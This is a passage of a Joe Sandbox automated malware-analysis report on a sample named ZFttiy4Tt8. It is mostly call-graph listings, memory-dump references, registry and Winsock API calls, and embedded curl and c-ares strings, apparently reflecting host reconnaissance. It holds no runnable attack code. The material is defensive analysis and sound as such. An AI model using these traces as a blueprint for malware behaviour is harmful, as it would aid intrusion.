e2a1d0 62920->62923 62922 e2a181 getsockname 62921->62922 62921->62923 62922->62923 62923->62919 63010 e28b50 63011 e28b6b 63010->63011 63029 e28bb5 63010->63029 63012 e28bf3 63011->63012 63013 e28b8f 63011->63013 63011->63029 63030 e2a550 63012->63030 63045 e06e40 select 63013->63045 63016 e28bfc 63020 e28c35 63016->63020 63021 e28c1f connect 63016->63021 63027 e28cb2 63016->63027 63016->63029 63017 e28cd9 SleepEx getsockopt 63018 e28d18 63017->63018 63022 e28d43 63018->63022 63018->63027 63019 e2a150 getsockname 63026 e28dff 63019->63026 63024 e2a150 getsockname 63020->63024 63021->63020 63025 e2a150 getsockname 63022->63025 63028 e28ba1 63024->63028 63025->63029 63026->63029 63046 df78b0 closesocket 63026->63046 63027->63019 63027->63026 63027->63029 63028->63017 63028->63027 63028->63029 63031 e2a575 63030->63031 63035 e2a597 63031->63035 63048 df75e0 63031->63048 63033 df78b0 closesocket 63034 e2a713 63033->63034 63034->63016 63036 e2a811 setsockopt 63035->63036 63041 e2a83b 63035->63041 63043 e2a69b 63035->63043 63036->63041 63038 e2af56 63039 e2af5d 63038->63039 63038->63043 63039->63034 63040 e2a150 getsockname 63039->63040 63040->63034 63041->63043 63044 e2abe1 63041->63044 63054 e26be0 select closesocket 63041->63054 63043->63033 63043->63034 63044->63043 63053 e567e0 ioctlsocket 63044->63053 63045->63028 63047 df78c5 63046->63047 63047->63029 63049 df75ef 63048->63049 63050 df7607 socket 63048->63050 63049->63050 63052 df7643 63049->63052 63051 df762b 63050->63051 63051->63035 63052->63035 63053->63038 63054->63044 62924 df13c9 62926 df1160 62924->62926 62927 df13a1 62926->62927 62928 1178a20 _lock 62926->62928 62928->62926 62929 1277830 62930 127785a 62929->62930 62931 1277866 62930->62931 62932 1277950 62930->62932 62934 1277906 62930->62934 62938 117b500 _lock 62932->62938 62933 1277944 62934->62933 62939 117b500 _lock 62934->62939 62936 1277979 62938->62936 62939->62936 62940 117b180 Sleep 63055 ea5a50 63056 ea5a58 63055->63056 63060 ea5ea0 
63055->63060 63057 ea5b50 63056->63057 63066 ea5a99 63056->63066 63070 ea5b88 63056->63070 63061 ea5b7a 63057->63061 63062 ea5eb4 63057->63062 63057->63070 63058 ea5e96 63085 eb9480 closesocket 63058->63085 63076 ea70a0 63061->63076 63086 ea6f10 socket ioctlsocket connect getsockname closesocket 63062->63086 63065 ea5ec2 63065->63065 63069 ea70a0 6 API calls 63066->63069 63066->63070 63083 ea6f10 socket ioctlsocket connect getsockname closesocket 63066->63083 63069->63066 63070->63058 63072 eba920 63070->63072 63084 eb9320 closesocket 63070->63084 63073 eba944 63072->63073 63074 eba94b 63073->63074 63075 eba977 send 63073->63075 63074->63070 63075->63070 63077 ea70ae 63076->63077 63079 ea717f 63077->63079 63082 ea71a7 63077->63082 63087 eba8c0 63077->63087 63091 ea71c0 socket ioctlsocket connect getsockname 63077->63091 63079->63082 63092 eb9320 closesocket 63079->63092 63082->63070 63083->63066 63084->63070 63085->63060 63086->63065 63088 eba903 recvfrom 63087->63088 63089 eba8e6 63087->63089 63090 eba8ed 63088->63090 63089->63088 63089->63090 63090->63077 63091->63077 63092->63082
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 43660dd911230de6862133aae0a0d80662ac07a2e7967b37b3f4affc35b0fbe9
                                                              • Instruction ID: cc5d94b69df1f12606e83bc36b38980fb6bb5b6a5ad21f11053cc7f66e3f6e2b
                                                              • Opcode Fuzzy Hash: 43660dd911230de6862133aae0a0d80662ac07a2e7967b37b3f4affc35b0fbe9
                                                              • Instruction Fuzzy Hash: E2C2AF31A043549FD724CF28D484B6ABBF1BF84318F05967DEC99AB262D771E984CB81

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00DF2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 00DF25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00DF2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 00DF267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 00DF27E2
                                                              • FindFirstFileW.KERNELBASE ref: 00DF28F8
                                                              • FindNextFileW.KERNELBASE ref: 00DF291F
                                                              Strings
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: @$`
                                                              • API String ID: 3271271169-3318628307
                                                              • Opcode ID: 17626b54f7487ad7417b36b2d7eac638171a5aa290488ea674f1774cdc065c23
                                                              • Instruction ID: 2e11fe09b98a01799cc1af31bab1184c7387e43c91d58c618df196c21fce310f
                                                              • Opcode Fuzzy Hash: 17626b54f7487ad7417b36b2d7eac638171a5aa290488ea674f1774cdc065c23
                                                              • Instruction Fuzzy Hash: 0ED1C3B49093199FDB50EF68C5846AEBBF4BF48354F00896DE898D7314E7349A84CF92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1362 df29ff-df2a2f FindFirstFileA 1363 df2a38 1362->1363 1364 df2a31-df2a36 1362->1364 1365 df2a3d-df2a91 call 1279c50 call 1279ce0 RegOpenKeyExA 1363->1365 1364->1365 1370 df2a9a 1365->1370 1371 df2a93-df2a98 1365->1371 1372 df2a9f-df2b0c call 1279c50 call 1279ce0 CharUpperA call 1178da0 1370->1372 1371->1372 1380 df2b0e-df2b13 1372->1380 1381 df2b15 1372->1381 1382 df2b1a-df2b92 call 1279c50 call 1279ce0 call 1178e80 call 1178e70 1380->1382 1381->1382 1391 df2bcc-df2c66 QueryFullProcessImageNameA CloseHandle call 1178da0 1382->1391 1392 df2b94-df2ba3 1382->1392 1402 df2c6f 1391->1402 1403 df2c68-df2c6d 1391->1403 1395 df2ba5-df2bae 1392->1395 1396 df2bb0-df2bca call 1178e68 1392->1396 1395->1391 1396->1391 1396->1392 1404 df2c74-df2ce9 call 1279c50 call 1279ce0 call 1178e80 call 1178e70 1402->1404 1403->1404 1413 df2dcf-df2e1c call 1279c50 call 1279ce0 CloseHandle 1404->1413 1414 df2cef-df2d49 call 1178bb0 call 1178da0 1404->1414 1424 df2e23-df2e2e 1413->1424 1425 df2d4b-df2d63 call 1178da0 1414->1425 1426 df2d99-df2dad 1414->1426 1427 df2e37 1424->1427 1428 df2e30-df2e35 1424->1428 1425->1426 1435 df2d65-df2d7d call 1178da0 1425->1435 1426->1413 1430 df2e3c-df2ed6 call 1279c50 call 1279ce0 1427->1430 1428->1430 1443 df2eea 1430->1443 1444 df2ed8-df2ee1 1430->1444 1435->1426 1440 df2d7f-df2d97 call 1178da0 1435->1440 1440->1426 1448 df2daf-df2dc9 call 1178e68 1440->1448 1447 df2eef-df2f16 call 1279c50 call 1279ce0 1443->1447 1444->1443 1446 df2ee3-df2ee8 1444->1446 1446->1447 1448->1413 1448->1414
                                                              APIs
                                                              Strings
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: a61528ffe111a32258f1bdd14332862e66b27eefabf48d33a67d05200d2a625f
                                                              • Instruction ID: 6df2e75f40087e433905971712656ab7fc87dc6f93f65a50b1c4ad9b4eb6697e
                                                              • Opcode Fuzzy Hash: a61528ffe111a32258f1bdd14332862e66b27eefabf48d33a67d05200d2a625f
                                                              • Instruction Fuzzy Hash: B5E1FEB49043099FDB50EF68D5846AEBBF8BF44308F118869E998D7354E734D988CF52

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Control-flow graph (rendered graph not reproduced): basic blocks e005b0-e00aa4, with calls to WSAEventSelect in blocks e00707-e00719 and e009d0-e009e6, and to WSAEnumNetworkEvents in block e009e8-e00a03.
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00E00712
                                                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00E009DC
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E009FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: multi.c
                                                              • API String ID: 2170980988-214371023
                                                              • Opcode ID: c393cb248ec465c74649a13199ea898589f49b5fca2ce87a1c1e9f96a309ddd6
                                                              • Instruction ID: 9b3d07009b5d5b9682dd4ccc10570586cd1ffa3934853a8c357e6a4b782efbdd
                                                              • Opcode Fuzzy Hash: c393cb248ec465c74649a13199ea898589f49b5fca2ce87a1c1e9f96a309ddd6
                                                              • Instruction Fuzzy Hash: ABD1D1756083019FE710DF64C881BBB77E5FF94348F08982DF984A6281E774E994CB62

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Control-flow graph (rendered graph not reproduced): basic blocks ebb180-ebb589, with a call to getsockname in block ebb2a9-ebb2c7.
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 00EBB2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 8aa98c063ca760ded8cbecd6fa4ce7ede3216f5d8862dd5df18127488c11096b
                                                              • Instruction ID: c86e2167413549f1bd35dfd46861eac2e31c29966b67f2c85abfbb0af3a517f9
                                                              • Opcode Fuzzy Hash: 8aa98c063ca760ded8cbecd6fa4ce7ede3216f5d8862dd5df18127488c11096b
                                                              • Instruction Fuzzy Hash: F3C180716053059FD718DF24C881AAB77E2FF88308F04996DE84AAB3A1D7B0ED45CB81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e07d98a1f01282a5522a5e6e87bc09612aaf38f5991972628d50a3c3acc5fa9f
                                                              • Instruction ID: b3e965320fabe52d61acf32e5545ab7674c547d9e875b1a37941d1299d564180
                                                              • Opcode Fuzzy Hash: e07d98a1f01282a5522a5e6e87bc09612aaf38f5991972628d50a3c3acc5fa9f
                                                              • Instruction Fuzzy Hash: A1911530A0D3494BE7358A6888947BB72D5EFD4328F14AB2CE8D8631D4EB74BCD1D691
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00EA712E,?,?,?,00001001,00000000), ref: 00EBA90D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: e345fe33121241ee31f30e8b17c8d156f60ab8d3678aa8734df8131c04d4aba7
                                                              • Instruction ID: 978b849c02909f1b47ef27222af94452dcab22a90b368ff435b52bc7beb55484
                                                              • Opcode Fuzzy Hash: e345fe33121241ee31f30e8b17c8d156f60ab8d3678aa8734df8131c04d4aba7
                                                              • Instruction Fuzzy Hash: 80F06D75108308BFD6209F01EC88DABBBEDEFC9758F05496DF948232118270AE10DAB2
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EAAA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EAAA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00EAAA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EAAAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EAAB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 00EAAB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00EAAB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00EAAC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00EAAD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 00EAAD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 00EAADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 00EAAE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00EAAE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EAAE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EAAF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EAAFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00EAB072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: a72ca7a6ac1e9edb09efcbe16d0933120d511db56da16e433a7f5bffd0d65840
                                                              • Instruction ID: db92699a8b65a5e338cfad31effcd3a768fc98a00bac9bbca35e034ebed08b44
                                                              • Opcode Fuzzy Hash: a72ca7a6ac1e9edb09efcbe16d0933120d511db56da16e433a7f5bffd0d65840
                                                              • Instruction Fuzzy Hash: D872A271604301AFE7209F24CC85F6BB7E8AF99704F18682CF985AB291E775E944CB53
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00E2A832
                                                              Strings
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00E2A6CE
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 00E2AE1F
                                                              • @, xrefs: 00E2AC42
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 00E2ADAC
                                                              • bind failed with errno %d: %s, xrefs: 00E2B080
                                                              • cf-socket.c, xrefs: 00E2A5CD, 00E2A735
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 00E2A796
                                                              • @, xrefs: 00E2A8F4
                                                              • Trying [%s]:%d..., xrefs: 00E2A689
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00E2AD0A
                                                              • Bind to local port %d failed, trying next, xrefs: 00E2AFE5
                                                              • Local port: %hu, xrefs: 00E2AF28
                                                              • Trying %s:%d..., xrefs: 00E2A7C2, 00E2A7DE
                                                              • Could not set TCP_NODELAY: %s, xrefs: 00E2A871
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 00E2AE60
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 7b6c29d0159a09d4f17e8f2948c4eb19312a619f02c0032ed0b3cdceb907647d
                                                              • Instruction ID: fddc5420d7d1997aa89b54cee51adb481b2ce705a8930c9f86b3637a548ba3ca
                                                              • Opcode Fuzzy Hash: 7b6c29d0159a09d4f17e8f2948c4eb19312a619f02c0032ed0b3cdceb907647d
                                                              • Instruction Fuzzy Hash: 65620871504341ABE721CF14DC46BABB7E5BF84318F08692DF988A7292E771E845CB93

                                                              Control-flow Graph: rendered graph not reproduced (entry block eb9740; executed / not-executed colouring lost in extraction)
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EB9946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00EB9974
                                                              • RegCloseKey.KERNELBASE(?), ref: 00EB998B
                                                              Strings
                                                              Memory Dump Source
